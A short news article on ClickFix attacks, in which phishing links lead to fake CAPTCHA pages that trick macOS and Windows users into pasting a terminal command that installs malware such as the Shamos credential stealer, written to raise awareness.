New ClickFix attacks trick users into installing malware unknowingly
What's the story
ClickFix, a new method of cyber attack, is rapidly becoming a major security threat for unsuspecting users. The technique is quick and can bypass most endpoint protections, making it effective against both macOS and Windows users. Scammers use various tactics to launch ClickFix attacks, including phishing emails from hotels with pending registrations or WhatsApp messages containing malicious links.
Attack method
How ClickFix works
Once a target clicks on the malicious link, they are taken to a site that displays a CAPTCHA challenge or some other pretext requiring user confirmation. The user is then instructed to copy a string of text and enter it into their terminal window. This action unwittingly directs their PC or Mac to a server controlled by scammers, leading to malware download and installation without any indication of compromise.
Campaign prevalence
Rise in ClickFix campaigns
Security firms have observed a surge in ClickFix campaigns, owing to the lack of awareness about this technique and its ability to bypass some endpoint protections. Researchers from CrowdStrike noted that "leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors." They also highlighted how these tactics are used to promote false malicious websites, encouraging more site traffic and potential victims.
Targeted platforms
Types of malware used in attacks
The primary malware used in these campaigns is a credential-stealer called 'Shamos.' Other malicious payloads include a cryptocurrency wallet, software to turn the infected Mac into a botnet, and macOS configuration changes for persistent malware execution. Notably, one campaign targeting Windows users involved compromising a hotel's account on Booking.com or similar sites to gain immediate trust with targets who are eager to comply with instructions for fear of canceling their stay.
Scam awareness
Raising awareness against scams
The effectiveness of ClickFix attacks also stems from the lack of awareness among users. Most people have learned to be wary of links in emails or messengers, but this precaution doesn't always extend to sites asking them to copy and paste text into an unfamiliar window. As families come together for holiday dinners in the coming weeks, it's crucial to raise awareness about these scams as a preventive measure against potential cyber threats during this festive season.